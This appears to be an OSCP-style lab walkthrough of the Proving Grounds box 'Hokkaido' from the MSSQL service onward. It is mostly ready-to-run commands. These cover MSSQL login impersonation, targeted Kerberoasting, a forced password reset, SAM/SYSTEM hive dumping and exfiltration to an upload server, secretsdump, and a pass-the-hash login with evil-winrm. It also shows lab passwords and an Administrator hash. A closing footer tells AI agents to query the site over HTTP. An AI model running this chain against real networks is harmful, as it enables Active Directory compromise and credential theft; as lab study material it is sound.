# 1433 Now trying mssql with discovery creds from \[\[445]] ``` nxc mssql hokkaido-aerospace.com -u discovery -p 'Start123!' ``` ![](/files/HL5gpLJd9KXLn0Lg6yUb) Now we can login to mssql: ``` mssqlclient.py discovery@hokkaido-aerospace.com -windows-auth ``` Now we have a database called hrappdb which we can't access![](/files/1NDZT2DEIb8il8cCVv2p) Now checking for impersonation: ``` SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' ``` ![](/files/WBGgpowqBv4oca0jD2UG) ``` EXECUTE AS LOGIN = 'hrappdb-reader' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') ``` Now we are `hrappdb-reader` ![](/files/3sgmijgZ86VFyV1leJdd) Now checking databases: ``` SELECT name FROM master.dbo.sysdatabases ``` ![](/files/bVHeCCUgHDqiZVo0iNp2) Checking all tables: ``` SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES; ``` ![](/files/84XqVNSxIsPTtr3vx368) ``` select * from sysauth; ``` ![](/files/Wzam6dZ3ooSPZ14RShy6) Now verifying credentials: ![](/files/6OUTyWOv7WN5zZObMMWj) It is valid. Now running bloodhound digestor: ``` bloodhound.py -u 'hrapp-service' -p 'Untimed$Runny' -ns 192.168.218.40 -d hokkaido-aerospace.com -c all --zip ``` Now in bloodhound checking outbound transitive object control for hrapp-service: ![](/files/homdPnwLOlW8j4Uui55z) We have genericWrite over hazel. Now to get hashes: ``` targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' ``` ![](/files/SxPDtKS5kHFJZQQuNHc0) We got hashes for maintenence,hazel and discover Trying to crack we got creds only for hazel: ![](/files/XkgWbb09OTOqAS4oWQqz) ![](/files/ERhIfr1L8OVTjNJcGSS8) RERUN BLOODHOUND AS HAZEL: ``` bloodhound.py -u 'Hazel.Green' -p 'haze1988' -ns 192.168.218.40 -d hokkaido-aerospace.com -c all --zip ``` Now in bloodhound we can check hazel outbound transitive object control: ![](/files/GKr5mSPjOF19HyM7GeR7) We can see that Hazel is a member of TIER2-ADMINS and IT. Checking member of IT: ![](/files/8wOEMQUs8QiI00Y7WdcN) We have 3 members: Molly.Smith: ![](/files/7wYEVTBJWpKwtiWHYU9N) Alexandra.Little: ![](/files/ciq2IMAfFVAelLQK9JqF) We can see Molly has more rights. Now checking Shortest path to domain admin: ![](/files/dbmHJdf7NRSTdrgoKlc0) Now resetting Molly's password: ``` net rpc password "molly.smith" "Password123@" -U "hokkaido-aerospace.com"/"Hazel.Green"%"haze1988" -S "dc.hokkaido-aerospace.com" ``` Now we can use rdp: ![](/files/6iq3IXxQneH1vjXnvDk3) ``` xfreerdp /u:molly.smith /p:'Password123@' /v:hokkaido-aerospace.com /cert-ignore /compression /auto-reconnect ``` Connect using xfreerdp: ![](/files/rFwB8WT4lUEmfJLGy5gw) We are molly.smith now Now running command prompt as administrator with molly's creds: ![](/files/Q4E63nOZUwjilnzk2bdl) Now we can use our SeBackupPrivilege to Privesc: ``` cd c:\ reg save hklm\sam c:\Temp\sam\ reg save hklm\system c:\Temp\system ``` Now we have sam and system in Temp directory. Now start a python upload server on kali: ``` python3 -m uploadserver 80 ``` Now upload sam ans system by visiting edge on windows target. Now use secretsdump.py: ``` secretsdump.py LOCAL -sam sam -system system ``` Now we have hashes for administrator: ![](/files/2A2O5g8uxHcd29iHNLuc) Now we have pwned it: ![](/files/wOVyp0TcvtbcH4I2ELAh) Now we can login with evil-winrm: ``` evil-winrm -i hokkaido-aerospace.com -u Administrator -H 'd752482897d54e239376fddb2a2109e4' ``` ![](/files/m71q6FV5hMUFJymA4DbE) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/walkthroughs/pg-practice/hokkaido/1433.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.